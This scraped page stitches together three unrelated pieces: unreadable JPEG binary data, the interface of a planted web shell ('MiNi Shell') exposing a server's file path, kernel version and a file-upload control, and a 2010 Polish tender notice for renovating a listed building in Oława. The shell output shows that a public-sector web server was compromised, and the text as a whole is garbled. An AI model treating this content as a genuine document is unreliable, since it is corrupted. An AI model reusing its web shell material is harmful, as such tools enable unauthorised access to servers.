JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100113/10762-N-2010.html

<p class="kh_header"><b>Oława: remont elewacji i dachu oraz przebudowy kanałów kominowych budynku przy Placu Zamkowym nr 17 w Oławie</b><br>
<b>Numer ogłoszenia: 10762 - 2010; data zamieszczenia: 13.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Oławie , ul. 3 Maja 1, 55-200 Oława, woj. dolnośląskie, tel. 071 3011522, faks 071 3011562.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont elewacji i dachu oraz przebudowy kanałów kominowych budynku przy Placu Zamkowym nr 17 w Oławie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu:
remontu elewacji i dachu oraz przebudowy kanałów kominowych budynku przy Placu Zamkowym               nr 17 w Oławie.
Kamienica ta jest ujęta w wojewódzkiej ewidencji zabytków i usytuowana w obszarze historycznego miasta Oławy wpisanego do rejestru zabytków  decyzją nr 391 z dnia 25.11.1956 r. oraz na terenie strefy A - ścisłej ochrony konserwatorskiej wyznaczonej w miejscowym planie zagospodarowania przestrzennego Centrum Oławy. 
Zakres prac obejmuje:
a)  remont elewacji:
- 	remont tynków z detalami wystroju elewacji ( odtworzenie gzymsów, obramowań okien, architektonicznych elementów elewacji ) z malowaniem w odcieniach ugru i cokole w kolorze brązu
- 	wymianę pozostałych okien drewnianych na stolarkę PCV w kolorze białym - ujednolicenie stolarki okiennej
- 	zabudowę nawiewników okiennych w pozostawianej i projektowanej stolarce okiennej
-	wymianę elementów blacharskich i ślusarskich na wykonane z tytan cynku patynowanego
- 	naprawa bramy wejściowej - kolor drzwi RAL 8024
- 	rozbiórka pomieszczenia gospodarczego przylegającego do budynku Nr 17 od tyłu kamienicy 
-  	montaż krat przy oknach piwnicznych elewacji frontowej - RAL 8019
- 	remont balkonu nad wejściem do budynku Nr 17 wraz z wykonaniem izolacji i posadzki  z gresu
- 	remont stalowej balustrady; wymiana części słupków, podniesienie balustrady, malowanie w kolorze RAL 8019
- 	wykonanie izolacji pionowej ścian zewnętrznych na wysokości cokołu
- 	remont pasa chodnika o szerokości 1 m przy elewacji frontowej budynku oraz wykonanie opasek o szerokości 50 cm przy budynkach od strony podwórza
-	likwidacja okratowania okien od strony podwórza oraz daszku nad wejściem

b) remont i budowa kominów:
- 	przebudowa istniejących kominów murowanych i z ceramicznych pustaków kominowych na wszystkich kondygnacjach  budynku oraz ponad dachem
- 	rozbiórka części kominów z ceramicznych pustaków kominowych
- 	budowa nowych kominów z betonowych kształtek kominowych
- 	budowa komina murowanego z cegły pełnej
- 	obudowa kominów z ceramicznych pustaków kominowych i betonowych kształtek kominowych w kondygnacji poddasza oraz ponad dachem cegłą pełną grub. 12 cm
- 	obudowa wszystkich kominów w kondygnacji poddasza oraz ponad dachem wełną mineralną ciętą w poprzek włókien metodą lekką
- 	wykonanie ław kominiarskich do wszystkich kominów
- 	wykonanie konstrukcji stalowych obudowy kominów, ułożonych na paskach styropianu EPS200 grub. 1 cm
- 	zabezpieczenie ppoż konstrukcji stalowej kominów farbą pęczniejącą do R60
- 	wykonanie wzmocnień kominów z ceramicznych pustaków wentylacyjnych i betonowych kształtek kominowych za pomocą obejm z prętów stalowych
- 	wykonanie wentylacji mechanicznej wywiewnej pomieszczenia biurowego, stołówki i kuchni w Domu Dziecka z zabudową wentylatorów dachowych na przebudowywanych kominach
- 	zabudowę konwektorów wentylatorowych w pomieszczeniach z wentylacją mechaniczną
- 	zabudowę wentylatorów łazienkowych w części pomieszczeń
c)  remont dachu:
- 	remont konstrukcji dachu (wymiana porażonych elementów drewnianych na nowe                             i wykonanie nowych z drewna sosnowego kl. C30) wraz z jej zabezpieczeniem biologicznym i przeciwpożarowym
- 	wymiana pokryć dachowych na pokrycie z dachówki ceramicznej, karpiówki układanej                       w koronkę, angobowanej, w kolorze ceglastym
- 	wymiana pokrycia na dachach płaskich z istniejącej papy na papę NRO
- 	ocieplenie stropów nad ostatnią kondygnacją użytkową z wełny mineralnej twardej grubości 20 cm, ułożonej na paroizolacji - folii PE, po skuciu istniejącej posadzki
- 	wykonanie warstwy wyrównawczej na poddaszach - posadzka betonowa grubości 5 cm, zbrojona przeciwskurczowo włóknami polipropylenowymi, dylatowana obwodowo oraz  w polach 6 x 6 m
- 	wykonanie wyłazów dachowych
- 	zabudowę stałych drabin stalowych lub drewnianych w przestrzeni poddaszy nieużytkowych do wyłazów dachowych
- 	wymiana elementów blacharskich i ślusarskich na wykonane z tytan cynku patynowanego
- 	wymiana rynien i rur spustowych na wykonane z tytan cynku patynowanego
- 	wykonanie instalacji odgromowej
d) roboty dodatkowe:
- 	wykonanie wzmocnienia spękanych ścian zewnętrznych II i III piętra od strony podwórza ściągami stalowymi
- 	rozbiórka istniejącego ogniomuru przy dachu płaskim Domu Dziecka, od strony podwórza i wykonanie nowego ogniomuru z cegły pełnej
- 	likwidacja pomieszczenia gospodarczego przylegającego do budynku nr 17 z tyłu kamienicy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium - 30 000 PLN. Zamawiający będzie żądać wniesienia wadium na etapie składania ofert przez wykonawców zaproszonych do ich złożenia, w formach określonych w art. 45 ust. 6 ustawy Prawo Zamówień Publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo Zamówień Publicznych. Zamawiający uzna, iż powyższe warunki zostały spełnione, jeżeli wykonawca: 
1.	wykaże, iż w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał min. dwie roboty budowlane  odpowiadające swoim rodzajem robotom budowlanym  stanowiącym przedmiot zamówienia    o wartości nie mniejszej niż 600.000,00 zł. brutto każda,(robota budowlana odpowiadająca swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia - należy przez to rozumieć budowę, a także remont budynku)  z podaniem ich wartości, daty i miejsca wykonania, potwierdzone dokumentami np. referencjami na dowód że roboty wykazane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocenie podlegać będzie ilość robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. 
Sposób oceny spełnienia warunku: Warunek będzie oceniany w skali 0-100 pkt. Wykonawca, który wykaże się największą ilością wykonanych robót budowlanych odpowiadających swoim rodzajem robotom budowlanym  stanowiącym przedmiot zamówienia otrzyma 100 pkt. Pozostali wykonawcy będą oceniani odpowiednio proporcjonalnie mniej w skali 0-100 pkt. 
2.	 dysponuje osobami zdolnymi do wykonania zamówienia: minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, w specjalności konstrukcyjno- budowlanej, posiadająca uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych tj.: takimi, które odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych
3. oświadczy, że spełnia warunki określone w art. 22 ust. 1 oraz że nie podlega wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 i 2 ustawy PZP; 
4. załączy aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku wykazania wiedzy i doświadczenia innych podmiotów wykonawca zobowiązany jest przedstawić pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ocena spełnienia ww warunków udziału w postępowaniu (oprócz pkt 1) odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty, oświadczenia i informacje: 
1. Wypełniony i podpisany wniosek o dopuszczenie do udziału w przetargu - wg ZAŁĄCZNIKA NR 1;
2. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy. Na potwierdzenie tego warunku należy wypełnić ZAŁĄCZNIK NR 2;
3. Oświadczenie Wykonawcy o spełnieniu warunków udziału w niniejszym postępowaniu na podstawie art. 50 PZP - wg ZAŁĄCZNIKA NR 3;
4. Zgodnie z art. 26 ust. 2 ustawy PZP załączy dokumenty wymienione w § 1 ust. 1 pkt. 2), 6), 7) i § 2 ust. 1 pkt. 1), 2), 3), 4), 5), 6) Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr 226, poz. 1817)
a) Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy                     i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania  wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone.
	Dla spełnienia warunku wystarczającym jest wykazanie się wykonaniem dwóch robót budowlanych na kwotę nie mniejszą niż 600.00,00 zł brutto każda. Na potwierdzenie tego warunku należy wypełnić ZAŁĄCZNIK NR 4;
b) Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Wykonawca powinien dysponować następującymi osobami przewidzianymi do realizacji zamówienia: minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, w specjalności konstrukcyjno- budowlanej, posiadająca uprawnienia do kierowania robotami budowlanymi przy zabytkach nieruchomych tj.: takimi, które odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych.                      Na potwierdzenie tego warunku należy wypełnić ZAŁĄCZNIK NR 5 i 6;
c) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,                             a w szczególności stosowne uprawnienia budowlane, wpis na listę członków właściwej Izby Samorządu Zawodowego;
d) Oświadczenie wykonawcy o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 PZP - wg ZAŁĄCZNIKA NR 7;
e) 	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają  wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału   w postępowaniu o udzielenie zamówienia;
f) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;
g) Aktualne zaświadczenie  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, potwierdzenia, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;
h) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. l pkt. 4-8 ustawy, wystawione nie wcześniej niż 6 miesiące przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.
Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby,
o których mowa w art. 24 ust. 1 pkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób;
i) 	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. l pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 4 litera e), f), g), h), i)  składa odpowiednio dokumenty wymienione w § 4 ust. 1 pkt 1) i 2) ust. 2 oraz ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr 226, poz. 1817)
6. Zgodnie z § 6 ust. 1 ww Rozporządzenia dokumenty, o których mowa w pkt 4 litera e), f), g), h), i)  składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę;
7. Zgodnie z § 6 ust. 4 ww Rozporządzenia dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski; 
8. Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia; 8.1.W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich                                  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy                      w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty. Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza, lub mocodawcę; 
8.2.W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w punkcie 4 litera e), f), g), h), i)  i w punkcie 5 winien dołączyć każdy podmiot występujący wspólnie. Oświadczenie wymienione w punkcie 2, 3, 4 lit. c) i d)  Wykonawcy mogą złożyć wspólnie na jednym dokumencie lub każdy z nich na odrębnym dokumencie; 
9. Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni jednego bądź więcej warunków, Wykonawca zostanie wykluczony z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy PZP. Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.starostwo.olawa.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Dziecka w Oławie pl. Zamkowy 17, 55-200 Oława..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:00, miejsce: Dom Dziecka w Oławie pl. Zamkowy 17, 55-200 Oława - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Do składania ofert zaproszonych zostanie 5 wykonawców. Lista wykonawców zaproszonych będzie ustalona wg następujących zasad : 
- lista wykonawców będzie tworzona na podstawie ilości punktów uzyskanych za ilość zrealizowanych robót budowlanych odpowiadających swoim rodzajem robotom budowlanym  stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 600.000,00 zł. brutto każda.
W przypadku uzyskania przez wykonawców równej ilości punktów, o kolejności wykonawców zadecyduje najwyższa, łączna wartość brutto robót wymienionych w wykazie (załącznik nr 4) spełniających wymagania zamawiającego Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, jest mniejsza niż 5 , zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki.
Wzór wniosku o dopuszczenie do udziału w postępowaniu (załącznik nr 1),  oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2), oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 3), doświadczenie zawodowe {załącznik nr 4), wykaz osób  będą uczestniczyć w wykonywaniu zamówienia (załącznik nr 5 i 6), oświadczenie o nie podleganiu wykluczeniu z postępowania (załącznik nr 7) znajdują się na stronie internetowej - http://www.bip.starostwo.olawa.pl. 
Wniosek musi być sporządzony w języku polskim, musi być podpisany przez osobę lub osoby upoważnione do reprezentowania wykonawcy. Upoważnienie osób podpisujących wniosek do jego podpisania musi bezpośrednio wynikać z dokumentów dołączonych do wniosku. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia do wniosku należy dołączyć oryginał dokumentu (lub kopię poświadczoną za zgodność z oryginałem przez notariusza, lub mocodawcę) ustanawiającego pełnomocnika do reprezentowania ich postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. Pozostałe dokumenty potwierdzające spełnianie warunków udziału w postępowaniu są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.

Creat By MiNi SheLL
Email: jattceo@gmail.com